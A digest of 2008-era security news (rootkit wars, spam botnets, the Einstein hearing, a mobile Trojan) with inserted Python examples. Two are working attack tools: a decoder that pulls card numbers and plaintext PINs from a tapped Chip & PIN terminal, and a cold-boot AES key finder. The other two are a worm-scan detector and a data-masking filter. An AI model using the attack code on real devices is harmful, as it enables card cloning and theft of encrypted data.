Malware removes rival rootkits

Miscreants have created a strain of malware capable of removing rootkits from compromised PCs, only to install almost undetectable backdoor code of its own.

The Pandex Trojan stops previously installed rootkits from working by removing their hooks into system calls. Pandex then installs its own rootkit component, detected by Trend Micro as Pushu-AC.

Rootkits are a type of malware that hide their presence on infected PCs, making them more dangerous than typical viruses. By operating below the level of traditional malware scanning tools, rootkits are able to carry out covert functions, for example keystroke-logging, without detection.

Virus writers have competed for control of vulnerable PCs several times in the past. For example, in 2005 separate groups of hackers released a barrage of worms in a battle to seize control of Windows PCs vulnerable to the then infamous Windows Plug-and-Play (PnP) vulnerability.

The Bozori worm was programmed to remove infections by earlier versions of the Zotob worm and other malware, so it could take control of a compromised computer for itself. A family of IRC bots that exploit the same Microsoft Plug and Play vulnerability likewise tried to remove competing PnP bots.

In early 2004, variants of the Netsky worm designed to remove Bagle and MyDoom infections from compromised PCs were released into the wild amid an ongoing war of words between rival VXers.

More recently, a turf war erupted between the creators of the Storm worm and rival gangs.

The Pandex Trojan updates this dishonourable tradition with code that replaces stealthier malware infections.

Malware writers team up for virus testing

Cyber-criminals and malware writers are looking for ways to test their creations before distributing them, according to research carried out by security firm PandaLabs.

An investigation conducted by the malware analysis and detection laboratory found that cyber-crooks are collaborating on different forums and internet sites.

The malware writers are attempting to develop test tools that replicate the scans of some of the leading security suites available to consumers and enterprises.

Panda Security believes this allows hackers to thoroughly check that their creations will be undetected before they are launched.

"The tool is very similar to Hispasec's legitimate VirusTotal tool," said Luis Corrons, technical director at PandaLabs.

"In fact, the increasing interest in these new tools coincides with the removal of the 'do not distribute the sample' option in VirusTotal, which allowed files to be scanned without sending the sample to security companies."

Corrons added that these tools represent another piece of the new malware dynamic in which cyber-crooks no longer seek to cause widespread alerts and make the headlines, but to go unnoticed.

"Even if their creations were detected by one or two companies, they could still launch them as they would affect all users with different security technologies," said Corrons.

Most spam comes from just six botnets

Six botnets are responsible for 85 per cent of all spam, according to an analysis by net security firm Marshal.

The Srizbi botnet is reckoned to be the largest single source of spam, accounting for 39 per cent of junk mail messages, followed by the Rustock botnet, responsible for 21 per cent of the spam clogging up users' inboxes.

Spam emanating from the Mega-D botnet, which Marshal reckons was the leading source of junk mail in early February, was temporarily stemmed after control servers were taken out in mid-February. The estimated 35,000 zombie clients associated with the Mega-D botnet were infected with the Ozdok Trojan.

After 10 days of inactivity, spam from compromised hosts began flowing again earlier this week, after hackers re-established control. Despite the break in transmission, Mega-D accounted for an estimated 11 per cent of junk mail hitting Marshal's spam traps during February.

Other active spam botnets include Hacktool.Spammer (AKA Spam-Mailer) and botnets associated with the Pushdo (AKA Pandex) family of malware.

The notorious Storm botnet, estimated to include about 85,000 compromised hosts, is thought to be responsible for only three per cent of spam.

"The size of a botnet, measured by how many bots it has, does not necessarily correlate with how much spam it sends. Our team has observed huge variations in the rate at which different spambots pump out spam," said Bradley Anstis, VP of products at Marshal.

In many instances, spammers have access to multiple botnets. In addition to Mega-D, other botnets, including Srizbi, Rustock, Hacktool.Spammer and Pushdo, have been simultaneously sending spam promoting Express Herbals, a line of male enhancement pills.

According to February statistics from managed security firm Network Box, the US continued to pump out the most spam and spread the most viruses. The country accounted for 13 per cent of all viruses and was the source of 15 per cent of all spam, more than double its closest junk mail rival, Turkey.

Researchers: UK card readers tappable

Computer scientists from the University of Cambridge announced this week that debit- and credit-card readers in the U.K. do not encrypt data to the PIN pad, allowing sensitive information to be stolen.

The PIN entry device (PED) vulnerabilities allow an attacker to wiretap a reader and collect enough data from cards and the PIN pad to create counterfeit cards, the researchers stated. The insecurity is due to the way the United Kingdom set up its "Chip & PIN" system and the way reader makers implemented the standard, the researchers stated in a paper to be published at the IEEE Symposium on Security and Privacy in May.

"The vulnerabilities we found were caused by a series of design errors by the manufacturers," Saar Drimer, a researcher at the University of Cambridge Computer Laboratory and an author of the paper, said in a statement. "They can be exploited because Britain's banks set up the Chip & PIN in an insecure way ... A villain who taps this gets all the information he needs to make a fake card, and to use it."

Credit- and debit-card fraud has garnered an increasing amount of attention as laws in the U.S. and Europe have required the disclosure of breaches of personal information. In 2007, retailer TJX Companies announced that online data thieves had gained access to its processing systems and stolen information on more than 100 million credit- and debit-card accounts. In November, the United Kingdom's tax agency acknowledged that two disks lost in the mail had sensitive information on 25 million parents and children.

Because of the losses, retailers have increased their security, albeit slowly, and also lobbied to remove requirements that they hold onto some customer data.

The attack uses a low-tech method of defeating the devices' tamper-resistant technology: a paper clip. The researchers inserted a paper clip through a hole in the device to tap into the signals sent between the reader and the key pad.

No recall of the devices is planned, the researchers stated.
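What a tap on the card-to-PED line actually yields can be shown with an added example; it is not the researchers' code and not anything from a terminal vendor. It assumes an EMV transaction using offline plaintext PIN verification, in which the PIN goes to the card in the clear inside the ISO 7816-4 VERIFY command (P2 = 0x80, PIN block format 2), and a READ RECORD response carrying the track 2 equivalent data (EMV tag 57). The APDU byte strings below are constructed, not captured from a real terminal:

```python
"""Decode card data and PIN from a tapped card-to-PED serial line.

Added example (not the Cambridge researchers' tool, not vendor code).
Assumes EMV offline plaintext PIN verification; the sample APDUs are
constructed for illustration and do not come from a real device.
"""


def parse_tlv(data, out=None):
    """Minimal BER-TLV parser (EMV subset): multi-byte tags, short and
    0x81/0x82 lengths, recursion into constructed templates like 70."""
    out = {} if out is None else out
    i = 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):            # inter-object padding
            i += 1
            continue
        start = i
        i += 1
        if (data[start] & 0x1F) == 0x1F:       # subsequent tag bytes follow
            while data[i] & 0x80:
                i += 1
            i += 1
        tag = data[start:i].hex().upper()
        length = data[i]
        i += 1
        if length == 0x81:
            length = data[i]
            i += 1
        elif length == 0x82:
            length = int.from_bytes(data[i:i + 2], "big")
            i += 2
        value = data[i:i + length]
        i += length
        if data[start] & 0x20:                 # constructed: recurse
            parse_tlv(value, out)
        else:
            out[tag] = value
    return out


def track2_from_tag57(raw):
    """Tag 57 (Track 2 Equivalent Data): PAN, 'D' separator, expiry
    YYMM, service code, discretionary data, F-nibble padding."""
    nibbles = raw.hex().upper().rstrip("F")
    pan, rest = nibbles.split("D", 1)
    return {"pan": pan, "expiry_yymm": rest[:4], "service_code": rest[4:7]}


def pin_from_verify(block):
    """EMV plaintext PIN block (format 2): 0x2N, then N PIN digits, F padding."""
    if len(block) != 8 or block[0] >> 4 != 2:
        raise ValueError("not a format-2 PIN block")
    n = block[0] & 0x0F
    return block.hex()[2:2 + n]


def harvest(apdus):
    """apdus: list of (command, response) byte strings seen on the wire.
    Returns what the tap hands an attacker."""
    found = {}
    for cmd, rsp in apdus:
        cla, ins, p1, p2 = cmd[:4]
        accepted = rsp[-2:] == b"\x90\x00"
        if ins == 0x20 and p2 == 0x80 and accepted:      # VERIFY, plaintext PIN
            found["pin"] = pin_from_verify(cmd[5:5 + cmd[4]])
        elif ins == 0x20 and p2 == 0x88:                  # VERIFY, enciphered PIN
            found["pin"] = "enciphered; not readable from the tap"
        elif ins == 0xB2 and accepted:                    # READ RECORD
            tlv = parse_tlv(rsp[:-2])
            if "57" in tlv:
                found.update(track2_from_tag57(tlv["57"]))
            elif "5A" in tlv:
                found["pan"] = tlv["5A"].hex().upper().rstrip("F")
            if "5F20" in tlv:
                found["name"] = tlv["5F20"].decode("ascii").strip()
    return found


# Constructed exchange: READ RECORD returning tags 57 and 5F20 inside a
# 70 template, then VERIFY carrying a plaintext PIN block for PIN 1234.
SAMPLE_APDUS = [
    (bytes.fromhex("00B2010C00"),
     bytes.fromhex("701E" "5711" "4111111111111111D25122010000000000"
                   "5F2008" "444F452F4A4F484E" "9000")),
    (bytes.fromhex("0020008008" "241234FFFFFFFFFF"), bytes.fromhex("9000")),
]

if __name__ == "__main__":
    print(harvest(SAMPLE_APDUS))
```

The track 2 data alone is enough for a magnetic-stripe clone, which is the fake card the researchers describe; the PIN is only recoverable from the tap when the terminal sends it to the card in plaintext.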

Breaking the bank, specifically yours

Is your bank particularly prone to identity theft? Very bad news for those of you with accounts at HSBC, WaMu or Bank of America/MBNA: Those three financial institutions have the highest rates of identity-theft incident per billion on deposit, according to a new report released by researchers at the Berkeley Center for Law and Technology at UC-Berkeley.

Consumerist readers are already pulling apart the stats to entertaining effect, but the presence of BofA/MBNA at the "top" of the incidents-per-month stats also given in the report doesn't much inspire confidence in that institution, whatever the roots of the problem.

So what are the roots of the problem, really? Is BofA just that irresistible to identity thieves? Does the institution have a higher profile? Does it have dumber customers? Hard to say when all banks are so secretive about the stats that could help clarify the picture. Obviously, for instance, the number of depositors would be a better metric than billions on deposit in ascertaining which institutions are having the biggest ID-theft misery. But banks guard that info as zealously as you wish they were guarding your personal data.

Congress worries that .gov monitoring will spy on Americans

A new Bush administration plan to capture and analyze traffic on all federal government networks in real time is generating privacy worries from congressional Democrats and Republicans alike.

At a hearing convened here Thursday by the U.S. House of Representatives Homeland Security Committee, politicians directed pointed questions to Department of Homeland Security officials about their plans to expand an existing "intrusion detection" system known as Einstein. Among other things, the system will monitor visits from Americans--and foreigners--visiting .gov Web sites.

Einstein, which DHS calls an "early warning system" for cyber-incidents, is described in a Homeland Security document from September 2004 as "an automated process for collecting, correlating, analyzing, and sharing computer security information across the federal civilian government." It's still only in place at 15 federal agencies, but Homeland Security Secretary Michael Chertoff is requesting $293.5 million from Congress in next year's budget to roll it out government-wide.

The round-the-clock system captures traffic flow data, which currently includes source and destination IP addresses and ports, Internet Control Message Protocol data, and the length of data packets. According to an internal 2004 privacy impact assessment (PDF), "the program is not intended to collect information that will be retrieved by name or personal identifier." Members of the U.S. Computer Emergency Readiness Team, which coordinates federal responses to cyber attacks, analyze the downloaded records once per day in hopes of detecting worms and other "anomalous activity," pinpointing trends, and advising agencies on how best to configure their systems.
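What analysis of such flow records looks like, as an added example that is not part of the article and not Einstein's own code: the script uses only the fields listed above (addresses, ports, protocol and size, no payload) and flags a host whose tiny flows fan out to many peers on a single port, the signature of a scanning worm. The flow records and thresholds are constructed for illustration:

```python
"""Fan-out (worm scan) detection over flow metadata only.

Added example; not from the article and not DHS code. The records and
thresholds below are constructed.
"""
from collections import defaultdict
from ipaddress import ip_address

# Constructed flow records: (src, dst, proto, dport, bytes).
SAMPLE_FLOWS = (
    [("10.1.1.5", "203.0.113.10", "tcp", 443, 5120),   # ordinary browsing
     ("10.1.1.5", "203.0.113.11", "tcp", 80, 2048),
     ("10.1.1.7", "10.1.2.3", "icmp", 0, 64),           # a couple of pings
     ("10.1.1.7", "10.1.2.4", "icmp", 0, 64)]
    # 10.1.1.9 probes forty hosts on TCP/445 with 60-byte flows (SYN only)
    + [("10.1.1.9", "10.1.2.%d" % i, "tcp", 445, 60) for i in range(1, 41)]
)


def fan_out(flows, max_bytes=200):
    """Number of distinct destinations per (src, proto, dport), counting
    only small flows: probes that never got a real session going."""
    peers = defaultdict(set)
    for src, dst, proto, dport, nbytes in flows:
        for addr in (src, dst):
            ip_address(addr)                   # reject malformed records
        if nbytes <= max_bytes:
            peers[(src, proto, dport)].add(dst)
    return {key: len(dsts) for key, dsts in peers.items()}


def suspected_scanners(flows, min_peers=20, max_bytes=200):
    """Sources whose small flows reach >= min_peers hosts on one port.
    Returns {src: [(proto, dport, n_peers), ...]}."""
    out = defaultdict(list)
    for (src, proto, dport), n in fan_out(flows, max_bytes).items():
        if n >= min_peers:
            out[src].append((proto, dport, n))
    return dict(out)


if __name__ == "__main__":
    for src, hits in suspected_scanners(SAMPLE_FLOWS).items():
        for proto, dport, n in hits:
            print("%s: %d peers on %s/%d" % (src, n, proto, dport))
```

Nothing here needs packet content, which is the point Lewis makes below about where the privacy risk would actually begin; the trade-off is that the same metadata also shows which citizen's address visited which .gov site.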

Homeland Security says the setup has helped reduce the time it takes for agencies to share such data from four to five days to four to five hours. The next step is to hire more analysts and enable the analysis to occur in real time, DHS says.

Beyond that, it's not exactly clear what will change, including whether the system will gather more information than before, or what will be done with it. But some politicians said they're already apprehensive about the new plans.

"I encourage you to try to find something beyond Einstein that's going to be focusing on bad guys, not just focusing on the general public but finding some way to protect the privacy of American citizens," said Rep. Paul Broun (R-Ga.).

Rep. Jane Harman (D-Calif.) criticized the department on one hand for not treating cyber threats with sufficient urgency, a common refrain from members of both parties ever since the sprawling government agency's inception. But she also questioned the new approach being offered.

"I can assure you constituents of mine listening to this hearing are thinking about this as the government sets up a new spy network," she said. "What would you advise me to tell my constituents (who want to know) how I'm going to stop this latest government spy network?"

Robert Jamison, a Homeland Security undersecretary whose division oversees cybersecurity activities, declined to talk specifics, saying details must be reserved for a classified session.

"We have privacy and civil rights folks involved in this," he said. "We're in the process of doing a privacy impact assessment for the new capability as we move forward."

Government agencies are required by law to produce such a report whenever they're planning to use a new technology that could involve collection of personally identifiable information. The goal is to ensure that no information is collected, stored, or accessed either unnecessarily or unlawfully.

The fact that Homeland Security officials are drawing up a new privacy impact assessment for the expansion of the Einstein project would seem to indicate they're considering gathering additional information, although it was unclear after Thursday's hearing whether that's the case.

Jamison, for one, claimed Einstein's new capabilities will be "no different" from those in commercial products used to detect worms or other malware. He indicated, however, that the government has no intention of scaling back the scope of its network monitoring.

"Adversaries are very adept at hiding their attacks in normal traffic--normal, everyday traffic that comes across the network that very well could be disguised and could be malicious," Jamison told the committee.

Einstein is just one part of Homeland Security's attempts to revamp its cybersecurity reputation. It's also working with the Office of Management and Budget on a project that would reduce the number of points at which all federal agency networks connect to the Internet--which right now numbers around 4,000--and thus encounter vulnerabilities from outside their realms.

Whenever a system monitors users' communications, privacy concerns naturally arise, said James Lewis, who runs the technology policy wing of the Center for Strategic and International Studies, a Washington think tank, and is working with members of Congress to devise cybersecurity policy recommendations for the next president. In this case, however, he said he didn't see any reason to be alarmed about Einstein quite yet.

"For Einstein to really affect privacy, you'd need to monitor and collect the communications, store them, and analyze them (e.g. have somebody actually read the content)," he said in an e-mail interview after Thursday's hearing. "I'm told that DHS won't store Einstein data and won't be analyzing it, which greatly reduces any risk to privacy."

Committee leaders warned that they'd be watching closely to see whether the plans pan out.

"It's hard to believe this administration now believes it has the answers to secure our federal networks and critical infrastructure," said Committee Chairman Bennie Thompson (D-Miss.).

US fluffs Imperial defences

THE US has made a muppet of its hi-tech border defences along the Arizonian border with Mexico.

Border patrols in Tucson were meant to be patched into a sci-fi panoply of surveillance tools from their car-mounted laptop computers.

Instead, Mexican bandits, cotton picking job hopefuls, fugitive axe murderers and kiddy fiddlers were left free to fiesta! under the eye of an impotent big brother.

The US Department of Homeland Security has been forced to rethink its plans for an omniscient border patrol and contractor Boeing, which worked on the now defunct pilot, has been commissioned to draw up another set of blue prints for the Imperial defences.

Boeing managed in two years to implement a series of automated watchtowers with cameras, radar, and other unspecified sensor equipment, but the system was useless because none of the components could be connected, the US Government Accountability Office, Congress's watchdog, reported with a more diplomatic use of language.

The project was rushed, the costs had been under-estimated and the users hadn't been consulted. The command centre system, which was meant to give border patrollers a realtime view of the landscape and anything that moved in it, wasn't any good.

Boeing started working on another version of the COP (common operating picture) system that the Washington Post said would be based on military battleplan software.

DHS has specified that it should "detect, identify and classify" any object in the border area. Battleplans are meant to be displayed on car-mounted laptops in border patrol cars. The information is meant also to be linked with police and other government computer systems. Flying robot drones are to add to the panoply.

But border patrollers didn't even have their laptops secured properly. So when they bounced over the rugged Arizona terrain in pursuit of banditos, the computers flapped about and got broken.

The radars didn't work in the rain. The cameras were meant to pick out an economic refugee at 10km, but could only stretch to half of that. Residents along the border have been reluctant to give up their private land for the sake of the defences.

Officials of the Secure Border Initiative, as the programme is ironically known, said that the Boeing pilot, Project-28, was only a test run anyway. The GAO said it would be delayed and cost more than the DHS had specified.

The Alamo doesn't appear to be coping too well with the barbarian siege. Run for the hills.

Security experts warn of potential malicious AIR code

On Monday, Adobe Systems rolled out its new Web 2.0 development tool, Adobe Integrated Runtime, or AIR. Following its release were some concerns from the security community.

AIR, formerly Adobe Apollo, is a runtime environment that allows developers to use HTML, Flash, AJAX, Flex, and other Web 2.0 tools to create desktop applications. One such application built using Adobe AIR comes from Nickelodeon Online.

But some security experts are concerned about local file access by AIR applications. Recently, Firefox experienced a vulnerability that could have allowed remote attackers to access a targeted file system. To mitigate this, Adobe says it implemented a sandboxing environment; however, Adobe's documentation suggests that the sandboxes are less secure than a Web browser's sandbox.

Additionally, Adobe says that AIR applications need to be digitally signed; however, the certificates can be self-signed, and many users will ignore the warnings and run untrusted applications.

Finally, there is the potential for Cross-Site Scripting (XSS), SQL injection, and local link injection. While these threats are not limited to Adobe AIR, developers could gain a false sense of security by relying only on AIR's weaker sandbox protection.

Adobe has also provided the following: an informative article titled "Introduction to AIR security" and a white paper, "AIR Security" (PDF). But Lenny Zeltser, writing on the SANS Internet Storm Center site, notes that "many developers will be unaware of Adobe AIR security best practices or will knowingly take shortcuts that expose end users to attacks."

Bitlocker hack is easily prevented, Microsoft says

A disk encryption system built into Windows Vista remains a viable way to protect sensitive files, according to Microsoft. In a blog posting, Russ Humphries, senior product manager for Windows Vista Security, outlined simple steps that users can take to prevent an attack laid out last week in a high-profile research report. He says the hack can be easily prevented.

The researchers demonstrated a novel way to access files that presumably were locked using Vista's BitLocker and similar disk encryption systems offered by competitors such as Apple. They showed it was possible to pilfer the encryption key needed to unlock the files by accessing a "ghost image" that remained in a computer's memory after the system entered hibernation mode. Ten minutes after machines were powered down, the researchers were still able to access the key by using compressed air to cool the memory chips.
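How a key is picked out of such a memory image, as an added example in the spirit of the researchers' key-finding technique (it is not their tool and not Microsoft's code): it assumes the disk-encryption driver keeps the expanded AES-128 key schedule contiguous in RAM, so any 16-byte window can be tried as a candidate key and confirmed by recomputing the 160 bytes of round keys that must follow it, tolerating a few bits flipped by decay. The memory image is constructed, random filler with one planted schedule and three decayed bits:

```python
"""Locate an AES-128 key in a partly decayed memory image by finding
its key schedule.

Added example; not the cold-boot researchers' tool, not Microsoft code.
The memory image is constructed (random bytes plus one planted schedule
of the FIPS-197 example key).
"""
import random


def _rotl8(x, n):
    return ((x << n) | (x >> (8 - n))) & 0xFF


def _build_sbox():
    """AES S-box: inverse in GF(2^8) then the affine map. Walks the field
    with generator 3, keeping p *= 3 and q /= 3 so that q == 1/p."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF
        q = (q ^ (q << 1)) & 0xFF
        q = (q ^ (q << 2)) & 0xFF
        q = (q ^ (q << 4)) & 0xFF
        if q & 0x80:
            q ^= 0x09
        sbox[p] = q ^ _rotl8(q, 1) ^ _rotl8(q, 2) ^ _rotl8(q, 3) ^ _rotl8(q, 4) ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox


SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def expand_key(key):
    """FIPS-197 AES-128 key expansion: 16-byte key -> 176-byte schedule."""
    w = [bytes(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = bytearray(w[i - 1])
        if i % 4 == 0:
            t = t[1:] + t[:1]                          # RotWord
            t = bytearray(SBOX[b] for b in t)          # SubWord
            t[0] ^= RCON[i // 4 - 1]                   # Rcon
        w.append(bytes(a ^ b for a, b in zip(w[i - 4], t)))
    return b"".join(w)


def hamming(a, b):
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def find_aes128_keys(image, max_bit_errors=8):
    """Slide a 16-byte window over the image, treat it as a candidate key
    and confirm it against the 160 round-key bytes that must follow.
    Returns [(offset, key_hex, decayed_bits)]."""
    hits = []
    for off in range(len(image) - 176 + 1):
        cand = bytes(image[off:off + 16])
        errs = hamming(expand_key(cand)[16:], image[off + 16:off + 176])
        if errs <= max_bit_errors:
            hits.append((off, cand.hex(), errs))
    return hits


def build_sample_image(size=4096, key_offset=1000, seed=7):
    """Constructed 'dump': random filler, one planted schedule, and three
    single-bit flips in the round keys to stand in for decay."""
    rng = random.Random(seed)
    image = bytearray(rng.getrandbits(8) for _ in range(size))
    key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")   # FIPS-197 A.1
    image[key_offset:key_offset + 176] = expand_key(key)
    for pos, bit in ((40, 0x01), (77, 0x10), (150, 0x80)):
        image[key_offset + pos] ^= bit
    return bytes(image)


SAMPLE_IMAGE = build_sample_image()

if __name__ == "__main__":
    for off, key_hex, errs in find_aes128_keys(SAMPLE_IMAGE):
        print("key at offset %d: %s (%d decayed bits)" % (off, key_hex, errs))
```

On a real image the loop is the same over a few gigabytes. Flips inside the 16 key bytes themselves, which this example does not plant, are what the researchers' reconstruction from the redundancy of the schedule handles; the redundancy is also why the candidate cannot be a false positive in random data.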

According to Humphries, the hack is easily prevented. Users can configure BitLocker to prevent a PC from booting or resuming from hibernation without confirmation of a password or a second key contained on a USB stick.

"The thing to keep in mind here is the old adage of balancing security, usability and risk," he wrote. "For example BitLocker provides several options that allow for a user (or more likely Administrator) to increase their security protections but at the cost of somewhat lowering ease-of-use."

He said BitLocker allows administrators to remotely change protection settings by having a script execute.

"Thanks to BitLocker's design, which implements key abstraction, a script can be executed that adds pre-boot protection mechanisms without requiring the re-encryption of the hard disk. This script can therefore execute very quickly."

Exotica

Humphries also worked to downplay the likelihood that an attack as exotic as this one would work in the trenches of real-world crime. Thieves would first have to get physical access to a machine, and the machine would most likely need to be in sleep mode.

"I would posit that the opportunistic laptop thief is somewhat unlikely to carry a separate laptop on which they will have installed tools that allow them to reconstruct cryptographic keys - or for that matter have a can of compressed air handy."

The Bitlocker attack is a wake-up call for privacy and security buffs because it demonstrated a fundamental weakness in a key tool used to protect sensitive data. BitLocker, and a similar feature that Apple has baked into OS X called FileVault, allow users to encrypt selected files or entire hard drives. In the event a PC is lost or stolen, files containing trade secrets, employee data or other confidential information would be unreadable to anyone without the key.

According to the researchers, who came from Princeton University, Wind River Systems and the Electronic Frontier Foundation, there is little that can be done to prevent ghost images from being readily accessed. Software changes are likely to be ineffective, and altering the way hardware works inside a laptop would take years.

But as Humphries demonstrates, one or two additional measures could make all the difference. Question is, will anyone use them?

Trojan targets Windows Mobile

McAfee has unearthed a Windows Mobile PocketPC Trojan that disables security, installs via a memory card, can’t be uninstalled and makes itself your home page.

According to McAfee's Avert Labs blog, the Trojan has been discovered in China. Here's how it works, according to researcher Jimmy Shah:

WinCE/InfoJack sends the infected device’s serial number, operating system and other information to the author of the Trojan. It also leaves the infected mobile device vulnerable by allowing silent installation of malware. The Trojan modifies the infected device’s security setting to allow unsigned applications to be installed without a warning.

The Trojan was packed inside a number of legitimate installation files and distributed widely. It has been distributed with Google Maps, applications for stock trading, and a collection of games.

Considering the penetration of mobile devices in Asia this malware could raise quite a ruckus.

Shah reckons that WinCE/InfoJack was created by a web site that may have hired a hacker to create the malware and then distribute it. The Trojan installs as an autorun program on the memory card, installs itself when that memory card is inserted and can’t be deleted. It also becomes your home page.

Killer robots pose latest militant threat: expert

LONDON (Reuters) - Killer robots could become the weapon of choice for militants, a British expert said on Wednesday.

Noel Sharkey, professor of artificial intelligence and robotics at the University of Sheffield said he believed falling costs would soon make robots a realistic option for extremist groups.

Several countries and companies are developing the technology for robot weapons, with the U.S. Department of Defense leading the way. More than 4,000 robots are deployed in Iraq.

"The trouble is that we can't really put the genie back in the bottle. Once the new weapons are out there, they will be fairly easy to copy," Sharkey will tell a one-day conference organized by Britain's Royal United Services Institute on Wednesday.

"How long is it going to be before the terrorists get in on the act? With the current prices of robot construction falling dramatically and the availability of ready-made components for the amateur market, it wouldn't require a lot of skill to make autonomous robot weapons."

Sharkey said a small GPS-guided drone with autopilot could be made for about 250 pounds ($490).

U.S. health care records are the target of foreign hackers

According to a recent article in Federal Computer Week, foreign criminal hackers are targeting American health records.

Mark Walker of DHS Critical Infrastructure Protection Division recently told a National Institute of Standards and Technology workshop that the hackers' primary motive seems to be espionage. For example, any health problems among the nation's leaders would be of interest to potential enemies, he said.

Walker cited two events from 2007. In one, a virus was placed on the Centers for Disease Control and Prevention Web site. In another, there was a known data breach in the Tricare records for the Military Health System.

The Department of Homeland Security wants to build a database of health care-related data breaches. At present, Walker told the workshop that the DHS only has a vague understanding of data loss connected with health care services.

On a related note, the U.S. Department of Health & Human Services has outlined the bases and procedures for imposing civil money penalties on covered entities that violate any of the Health Insurance Portability & Accountability Act of 1996 (HIPAA) Administrative Simplification Rules. The Centers for Medicare and Medicaid Services (CMS) will enforce the HIPAA Transactions and Code Set Standards, while the Office for Civil Rights will enforce the Privacy Standards. The final rules for security compliance cover specific areas of data storage, such as who must be interviewed regarding compliance, and what aspects of the company's IT security policy must be reviewed.

Data breaches lose customers

The average data breach can cost anywhere between £84,000 and £3.8m, depending on how quickly it is discovered and the type of information lost, says research.

The average cost is £47 per individual record compromised – except in financial services firms where costs rise 17 per cent to £55 per record, according to the study by the Ponemon Institute.

Data is mostly lost through third parties, said Joseph Ansanelli, vice president of data loss prevention solutions at Symantec, which sponsored the research.

"The fact that more than a third of breaches result from data being shared with third parties in the normal course of business is a clear signal that organisations should examine how they are sharing their customers' data with outsourcers, vendors, and partners," he said.

Companies suffering a breach see a 2.5 per cent higher than normal customer "churn" rate, which contributes up to a third of the costs incurred.

More than a third (36 per cent) of data breaches are due to lost and stolen laptops or other mobile devices.

Does Your Security Suite Also Protect Your Privacy?

The major suites promise to safeguard your private data--but their protections vary.

Privacy control. Personal-information protection. Identity control. All are great-sounding names for features you may have seen in your PC's security suite. But what do they actually do?

To find out, I dug into the privacy features of the top suites from PC World's latest security roundup: Symantec Norton Internet Security 2008's Privacy Control (part of its free Norton Add-on Pack), Kaspersky Internet Security 7.0's Privacy Control, McAfee Internet Security Suite's Personal Information Protection, and BitDefender Internet Security Suite 2008's Identity Control.

With Symantec, McAfee, and BitDefender, you must define the information that you want to protect, such as Social Security and credit card numbers. Symantec and McAfee never prompt you to do so, but BitDefender alerts you until you either comply or tell it to stop. With Kaspersky, you don't give any instructions, since it automatically blocks malware that attempts to access your computer's Windows Protected Storage area, including sensitive Web-form information such as credit card numbers.

If the Symantec, McAfee, or BitDefender suite notices that your PC is about to send the information you registered over the Internet, the program blocks the transmission or prompts you to allow or disallow it. Symantec checks Web, e-mail, and IM connections, BitDefender scans Web and e-mail traffic, and McAfee handles just Web data. All three are limited to scanning nonencrypted connections, so they won't see anything you send to secure sites, but such https:// sites are mostly already protected. And since many Internet service providers accept e-mail only via an encrypted connection, the privacy apps can't scan those messages either. Generally, though, they can scan Web-based e-mail such as Google's Gmail, because most providers require you to use a secure connection to log in but switch to a nonsecure connection once you are in.

Symantec and McAfee prompt you to allow sending personal data, and substitute asterisks for the data when you choose to block sending it. BitDefender blocks outright any e-mail or Web pages in which you've entered personal data without giving you any option to make it do otherwise, which can be annoying.

If you have Symantec's package or McAfee's suite, take the few minutes required to define your sensitive information. I can't think of a site that would ask for such details and not be encrypted, and setting up the privacy protections will allow you to receive warnings. BitDefender's feature, however, may irritate more than it protects because it doesn't allow sending protected data even if you trust the situation. Kaspersky's feature is both more and less limited, since its malware-focused approach doesn't require any extra setup but protects only a subset of your information.
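What those features do mechanically is simpler than their names suggest. The following is an added example, not any vendor's code, of the outbound check: it takes a form-encoded HTTP request body as the browser would send it, looks for the strings you registered plus anything that looks like a Luhn-valid card number, and either masks the values with asterisks (the Symantec/McAfee behaviour) or refuses the request outright (the BitDefender behaviour). A TLS connection is modelled with a flag, because the filter sees only ciphertext there and has to pass it through, which is exactly the limitation described above. The sample bodies are constructed.

```python
# Added example (not any vendor's code): a minimal outbound "privacy control"
# filter. It inspects a form-encoded HTTP body before transmission, finds
# registered strings and Luhn-valid card numbers, then masks or blocks.
# Sample inputs are constructed; tls=True models an https:// connection the
# filter cannot read.
import re
from typing import Iterable, List, Tuple
from urllib.parse import parse_qsl, urlencode

# 13-19 digits, optionally separated by spaces or dashes
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: doubles every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_sensitive(value: str, registered: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (kind, matched_text) for each registered item or plausible card number."""
    hits = [("registered", item) for item in registered if item in value]
    for m in CARD_RE.finditer(value):
        if luhn_ok(re.sub(r"[ -]", "", m.group())):
            hits.append(("card", m.group()))
    return hits


def filter_request(body: str, registered: Iterable[str], tls: bool = False,
                   mode: str = "mask") -> Tuple[str, str]:
    """mode='mask' substitutes asterisks (Symantec/McAfee style);
    mode='block' refuses the whole request (BitDefender style).
    Returns (action, body_to_send)."""
    if tls:
        return "passed", body              # encrypted: nothing to inspect
    registered = list(registered)
    fields = parse_qsl(body, keep_blank_values=True)
    out, hit = [], False
    for name, value in fields:
        found = find_sensitive(value, registered)
        if found:
            hit = True
            for _, match in found:
                value = value.replace(match, "*" * len(match))
        out.append((name, value))
    if not hit:
        return "passed", body
    if mode == "block":
        return "blocked", ""
    return "masked", urlencode(out, safe="*")


if __name__ == "__main__":
    secrets = {"123-45-6789"}            # the user's registered SSN (constructed)
    print(filter_request("ssn=123-45-6789&name=Ann", secrets))
    print(filter_request("card=4111+1111+1111+1111", secrets, mode="block"))
    print(filter_request("ssn=123-45-6789", secrets, tls=True))
```

The tls branch is the whole point of the review's caveat: anything a site collects over https:// is invisible to this kind of filter, so its value lies in catching data typed into plain-HTTP pages, webmail sessions that drop to http:// after login, and unencrypted mail or IM.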

Researchers hack 'tamper-proof' PIN terminals

Researchers from Cambridge University have succeeded in capturing both PINs and card details from supposedly tamper-proof PIN entry devices.

